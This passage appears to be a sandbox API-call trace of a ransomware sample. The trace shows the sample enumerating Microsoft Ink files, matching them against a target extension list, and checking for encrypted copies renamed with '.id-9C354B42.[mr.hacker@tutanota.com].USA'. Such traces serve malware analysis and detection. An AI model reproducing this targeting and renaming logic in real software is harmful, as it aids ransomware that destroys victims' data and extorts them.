Shared\\ink\\ar-SA\\tipresx.dll.mui") returned 72 [0055.762] lstrlenW (lpString=".doc") returned 4 [0055.762] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0055.762] lstrlenW (lpString=".docx") returned 5 [0055.762] lstrcmpiW (lpString1=".docx", lpString2="l.mui") returned -1 [0055.762] lstrlenW (lpString=".pdf") returned 4 [0055.762] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0055.762] lstrlenW (lpString=".xls") returned 4 [0055.762] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0055.762] lstrlenW (lpString=".xlsx") returned 5 [0055.762] lstrcmpiW (lpString1=".xlsx", lpString2="l.mui") returned -1 [0055.762] lstrlenW (lpString=".ppt") returned 4 [0055.762] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0055.762] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA\\tipresx.dll.mui") returned 72 [0055.762] lstrlenW (lpString=".zip") returned 4 [0055.762] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0055.762] lstrlenW (lpString=".rar") returned 4 [0055.762] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0055.762] lstrlenW (lpString=".bz2") returned 4 [0055.762] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0055.762] lstrlenW (lpString=".7z") returned 3 [0055.762] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0055.762] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA\\tipresx.dll.mui") returned 72 [0055.762] lstrlenW (lpString=".dbf") returned 4 [0055.762] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0055.762] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA\\tipresx.dll.mui") returned 72 [0055.762] lstrlenW (lpString=".1cd") returned 4 [0055.762] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0055.762] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA\\tipresx.dll.mui") returned 72 [0055.762] lstrlenW (lpString=".jpg") returned 4 [0055.762] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0055.763] lstrcmpiW (lpString1=".mui", lpString2=".USA") returned -1 [0055.763] lstrlenW (lpString="tipresx.dll.mui") returned 15 [0055.763] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\bg-bg\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x224 [0055.763] GetFileSizeEx (in: hFile=0x224, lpFileSize=0x32bff1c | out: lpFileSize=0x32bff1c*=4096) returned 1 [0055.763] CloseHandle (hObject=0x224) returned 1 [0055.763] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\bg-bg\\tipresx.dll.mui")) returned 0x20 [0055.763] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG\\tipresx.dll.mui.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\bg-bg\\tipresx.dll.mui.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0055.764] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\bg-bg\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0055.764] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG\\tipresx.dll.mui") returned 72 [0055.764] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG\\tipresx.dll.mui") returned 72 [0055.764] lstrlenW (lpString=".doc") returned 4 [0055.764] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0055.764] lstrlenW (lpString=".docx") returned 5 [0055.764] lstrcmpiW (lpString1=".docx", lpString2="l.mui") returned -1 [0055.764] lstrlenW (lpString=".pdf") returned 4 [0055.764] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0055.764] lstrlenW (lpString=".xls") returned 4 [0055.764] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0055.764] lstrlenW (lpString=".xlsx") returned 5 [0055.764] lstrcmpiW (lpString1=".xlsx", lpString2="l.mui") returned -1 [0055.764] lstrlenW (lpString=".ppt") returned 4 [0055.764] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0055.764] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG\\tipresx.dll.mui") returned 72 [0055.764] lstrlenW (lpString=".zip") returned 4 [0055.764] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0055.764] lstrlenW (lpString=".rar") returned 4 [0055.764] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0055.764] lstrlenW (lpString=".bz2") returned 4 [0055.764] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0055.764] lstrlenW (lpString=".7z") returned 3 [0055.764] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0055.764] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG\\tipresx.dll.mui") returned 72 [0055.764] lstrlenW (lpString=".dbf") returned 4 [0055.764] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0055.764] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG\\tipresx.dll.mui") returned 72 [0055.764] lstrlenW (lpString=".1cd") returned 4 [0055.764] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0055.764] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG\\tipresx.dll.mui") returned 72 [0055.765] lstrlenW (lpString=".jpg") returned 4 [0055.765] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0055.765] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG\\tipresx.dll.mui") returned 72 [0055.765] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG\\tipresx.dll.mui") returned 72 [0055.765] lstrlenW (lpString=".doc") returned 4 [0055.765] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0055.765] lstrlenW (lpString=".docx") returned 5 [0055.765] lstrcmpiW (lpString1=".docx", lpString2="l.mui") returned -1 [0055.765] lstrlenW (lpString=".pdf") returned 4 [0055.765] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0055.765] lstrlenW (lpString=".xls") returned 4 [0055.765] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0055.765] lstrlenW (lpString=".xlsx") returned 5 [0055.765] lstrcmpiW (lpString1=".xlsx", lpString2="l.mui") returned -1 [0055.765] lstrlenW (lpString=".ppt") returned 4 [0055.765] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0055.765] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG\\tipresx.dll.mui") returned 72 [0055.765] lstrlenW (lpString=".zip") returned 4 [0055.765] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0055.765] lstrlenW (lpString=".rar") returned 4 [0055.765] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0055.765] lstrlenW (lpString=".bz2") returned 4 [0055.765] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0055.765] lstrlenW (lpString=".7z") returned 3 [0055.765] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0055.765] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG\\tipresx.dll.mui") returned 72 [0055.765] lstrlenW (lpString=".dbf") returned 4 [0055.765] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0055.765] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG\\tipresx.dll.mui") returned 72 [0055.765] lstrlenW (lpString=".1cd") returned 4 [0055.765] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0055.766] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG\\tipresx.dll.mui") returned 72 [0055.766] lstrlenW (lpString=".jpg") returned 4 [0055.766] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0055.766] lstrcmpiW (lpString1=".exe", lpString2=".USA") returned -1 [0055.766] lstrlenW (lpString="ConvertInkStore.exe") returned 19 [0055.766] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ConvertInkStore.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\convertinkstore.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x224 [0055.766] GetFileSizeEx (in: hFile=0x224, lpFileSize=0x32bff1c | out: lpFileSize=0x32bff1c*=193024) returned 1 [0055.766] CloseHandle (hObject=0x224) returned 1 [0055.766] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ConvertInkStore.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\convertinkstore.exe")) returned 0x20 [0055.767] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ConvertInkStore.exe.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\convertinkstore.exe.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0055.767] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ConvertInkStore.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\convertinkstore.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0055.767] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ConvertInkStore.exe") returned 70 [0055.767] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ConvertInkStore.exe") returned 70 [0055.767] lstrlenW (lpString=".doc") returned 4 [0055.767] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1 [0055.767] lstrlenW (lpString=".docx") returned 5 [0055.767] lstrcmpiW (lpString1=".docx", lpString2="e.exe") returned -1 [0055.767] lstrlenW (lpString=".pdf") returned 4 [0055.767] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0055.767] lstrlenW (lpString=".xls") returned 4 [0055.767] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1 [0055.767] lstrlenW (lpString=".xlsx") returned 5 [0055.767] lstrcmpiW (lpString1=".xlsx", lpString2="e.exe") returned -1 [0055.767] lstrlenW (lpString=".ppt") returned 4 [0055.767] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0055.767] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ConvertInkStore.exe") returned 70 [0055.767] lstrlenW (lpString=".zip") returned 4 [0055.767] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1 [0055.767] lstrlenW (lpString=".rar") returned 4 [0055.767] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1 [0055.767] lstrlenW (lpString=".bz2") returned 4 [0055.767] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1 [0055.767] lstrlenW (lpString=".7z") returned 3 [0055.767] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1 [0055.767] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ConvertInkStore.exe") returned 70 [0055.767] lstrlenW (lpString=".dbf") returned 4 [0055.767] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1 [0055.768] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ConvertInkStore.exe") returned 70 [0055.768] lstrlenW (lpString=".1cd") returned 4 [0055.768] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1 [0055.768] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ConvertInkStore.exe") returned 70 [0055.768] lstrlenW (lpString=".jpg") returned 4 [0055.768] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0055.768] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ConvertInkStore.exe") returned 70 [0055.768] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ConvertInkStore.exe") returned 70 [0055.768] lstrlenW (lpString=".doc") returned 4 [0055.768] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1 [0055.768] lstrlenW (lpString=".docx") returned 5 [0055.768] lstrcmpiW (lpString1=".docx", lpString2="e.exe") returned -1 [0055.768] lstrlenW (lpString=".pdf") returned 4 [0055.768] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0055.768] lstrlenW (lpString=".xls") returned 4 [0055.768] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1 [0055.768] lstrlenW (lpString=".xlsx") returned 5 [0055.768] lstrcmpiW (lpString1=".xlsx", lpString2="e.exe") returned -1 [0055.768] lstrlenW (lpString=".ppt") returned 4 [0055.768] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0055.768] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ConvertInkStore.exe") returned 70 [0055.768] lstrlenW (lpString=".zip") returned 4 [0055.768] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1 [0055.768] lstrlenW (lpString=".rar") returned 4 [0055.768] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1 [0055.768] lstrlenW (lpString=".bz2") returned 4 [0055.768] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1 [0055.768] lstrlenW (lpString=".7z") returned 3 [0055.768] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1 [0055.768] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ConvertInkStore.exe") returned 70 [0055.768] lstrlenW (lpString=".dbf") returned 4 [0055.768] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1 [0055.769] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ConvertInkStore.exe") returned 70 [0055.769] lstrlenW (lpString=".1cd") returned 4 [0055.769] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1 [0055.769] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ConvertInkStore.exe") returned 70 [0055.769] lstrlenW (lpString=".jpg") returned 4 [0055.769] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0055.769] lstrcmpiW (lpString1=".mui", lpString2=".USA") returned -1 [0055.769] lstrlenW (lpString="tipresx.dll.mui") returned 15 [0055.769] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\cs-cz\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x224 [0055.769] GetFileSizeEx (in: hFile=0x224, lpFileSize=0x32bff1c | out: lpFileSize=0x32bff1c*=3584) returned 1 [0055.769] CloseHandle (hObject=0x224) returned 1 [0055.770] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\cs-cz\\tipresx.dll.mui")) returned 0x20 [0055.770] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\tipresx.dll.mui.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\cs-cz\\tipresx.dll.mui.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0055.770] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\cs-cz\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0055.770] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\tipresx.dll.mui") returned 72 [0055.770] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\tipresx.dll.mui") returned 72 [0055.770] lstrlenW (lpString=".doc") returned 4 [0055.770] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0055.770] lstrlenW (lpString=".docx") returned 5 [0055.770] lstrcmpiW (lpString1=".docx", lpString2="l.mui") returned -1 [0055.770] lstrlenW (lpString=".pdf") returned 4 [0055.770] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0055.770] lstrlenW (lpString=".xls") returned 4 [0055.770] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0055.770] lstrlenW (lpString=".xlsx") returned 5 [0055.770] lstrcmpiW (lpString1=".xlsx", lpString2="l.mui") returned -1 [0055.770] lstrlenW (lpString=".ppt") returned 4 [0055.770] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0055.770] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\tipresx.dll.mui") returned 72 [0055.770] lstrlenW (lpString=".zip") returned 4 [0055.770] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0055.770] lstrlenW (lpString=".rar") returned 4 [0055.771] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0055.771] lstrlenW (lpString=".bz2") returned 4 [0055.771] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0055.771] lstrlenW (lpString=".7z") returned 3 [0055.771] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0055.771] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\tipresx.dll.mui") returned 72 [0055.771] lstrlenW (lpString=".dbf") returned 4 [0055.771] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0055.771] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\tipresx.dll.mui") returned 72 [0055.771] lstrlenW (lpString=".1cd") returned 4 [0055.771] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0055.771] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\tipresx.dll.mui") returned 72 [0055.771] lstrlenW (lpString=".jpg") returned 4 [0055.771] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0055.771] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\tipresx.dll.mui") returned 72 [0055.771] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\tipresx.dll.mui") returned 72 [0055.771] lstrlenW (lpString=".doc") returned 4 [0055.771] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0055.771] lstrlenW (lpString=".docx") returned 5 [0055.771] lstrcmpiW (lpString1=".docx", lpString2="l.mui") returned -1 [0055.771] lstrlenW (lpString=".pdf") returned 4 [0055.771] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0055.771] lstrlenW (lpString=".xls") returned 4 [0055.771] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0055.771] lstrlenW (lpString=".xlsx") returned 5 [0055.771] lstrcmpiW (lpString1=".xlsx", lpString2="l.mui") returned -1 [0055.771] lstrlenW (lpString=".ppt") returned 4 [0055.771] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0055.771] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\tipresx.dll.mui") returned 72 [0055.771] lstrlenW (lpString=".zip") returned 4 [0055.771] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0055.771] lstrlenW (lpString=".rar") returned 4 [0055.772] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0055.772] lstrlenW (lpString=".bz2") returned 4 [0055.772] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0055.772] lstrlenW (lpString=".7z") returned 3 [0055.772] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0055.772] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\tipresx.dll.mui") returned 72 [0055.772] lstrlenW (lpString=".dbf") returned 4 [0055.772] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0055.772] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\tipresx.dll.mui") returned 72 [0055.772] lstrlenW (lpString=".1cd") returned 4 [0055.772] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0055.772] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\tipresx.dll.mui") returned 72 [0055.772] lstrlenW (lpString=".jpg") returned 4 [0055.772] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0055.772] lstrcmpiW (lpString1=".mui", lpString2=".USA") returned -1 [0055.772] lstrlenW (lpString="tipresx.dll.mui") returned 15 [0055.772] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\da-dk\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x224 [0055.772] GetFileSizeEx (in: hFile=0x224, lpFileSize=0x32bff1c | out: lpFileSize=0x32bff1c*=3584) returned 1 [0055.773] CloseHandle (hObject=0x224) returned 1 [0055.773] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\da-dk\\tipresx.dll.mui")) returned 0x20 [0055.773] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK\\tipresx.dll.mui.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\da-dk\\tipresx.dll.mui.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0055.773] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\da-dk\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0055.773] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK\\tipresx.dll.mui") returned 72 [0055.773] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK\\tipresx.dll.mui") returned 72 [0055.773] lstrlenW (lpString=".doc") returned 4 [0055.773] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0055.773] lstrlenW (lpString=".docx") returned 5 [0055.773] lstrcmpiW (lpString1=".docx", lpString2="l.mui") returned -1 [0055.773] lstrlenW (lpString=".pdf") returned 4 [0055.773] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0055.773] lstrlenW (lpString=".xls") returned 4 [0055.773] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0055.773] lstrlenW (lpString=".xlsx") returned 5 [0055.773] lstrcmpiW (lpString1=".xlsx", lpString2="l.mui") returned -1 [0055.773] lstrlenW (lpString=".ppt") returned 4 [0055.773] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0055.773] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK\\tipresx.dll.mui") returned 72 [0055.773] lstrlenW (lpString=".zip") returned 4 [0055.774] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0055.774] lstrlenW (lpString=".rar") returned 4 [0055.774] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0055.774] lstrlenW (lpString=".bz2") returned 4 [0055.774] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0055.774] lstrlenW (lpString=".7z") returned 3 [0055.774] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0055.774] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK\\tipresx.dll.mui") returned 72 [0055.774] lstrlenW (lpString=".dbf") returned 4 [0055.774] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0055.774] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK\\tipresx.dll.mui") returned 72 [0055.774] lstrlenW (lpString=".1cd") returned 4 [0055.774] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0055.774] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK\\tipresx.dll.mui") returned 72 [0055.774] lstrlenW (lpString=".jpg") returned 4 [0055.774] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0055.774] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK\\tipresx.dll.mui") returned 72 [0055.774] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK\\tipresx.dll.mui") returned 72 [0055.774] lstrlenW (lpString=".doc") returned 4 [0055.774] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0055.774] lstrlenW (lpString=".docx") returned 5 [0055.774] lstrcmpiW (lpString1=".docx", lpString2="l.mui") returned -1 [0055.774] lstrlenW (lpString=".pdf") returned 4 [0055.774] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0055.774] lstrlenW (lpString=".xls") returned 4 [0055.774] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0055.774] lstrlenW (lpString=".xlsx") returned 5 [0055.774] lstrcmpiW (lpString1=".xlsx", lpString2="l.mui") returned -1 [0055.774] lstrlenW (lpString=".ppt") returned 4 [0055.774] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0055.774] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK\\tipresx.dll.mui") returned 72 [0055.775] lstrlenW (lpString=".zip") returned 4 [0055.775] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0055.775] lstrlenW (lpString=".rar") returned 4 [0055.775] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0055.775] lstrlenW (lpString=".bz2") returned 4 [0055.775] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0055.775] lstrlenW (lpString=".7z") returned 3 [0055.775] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0055.775] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK\\tipresx.dll.mui") returned 72 [0055.775] lstrlenW (lpString=".dbf") returned 4 [0055.775] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0055.775] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK\\tipresx.dll.mui") returned 72 [0055.775] lstrlenW (lpString=".1cd") returned 4 [0055.775] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0055.775] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK\\tipresx.dll.mui") returned 72 [0055.775] lstrlenW (lpString=".jpg") returned 4 [0055.775] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0055.775] lstrcmpiW (lpString1=".mui", lpString2=".USA") returned -1 [0055.775] lstrlenW (lpString="tipresx.dll.mui") returned 15 [0055.775] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\de-DE\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\de-de\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, 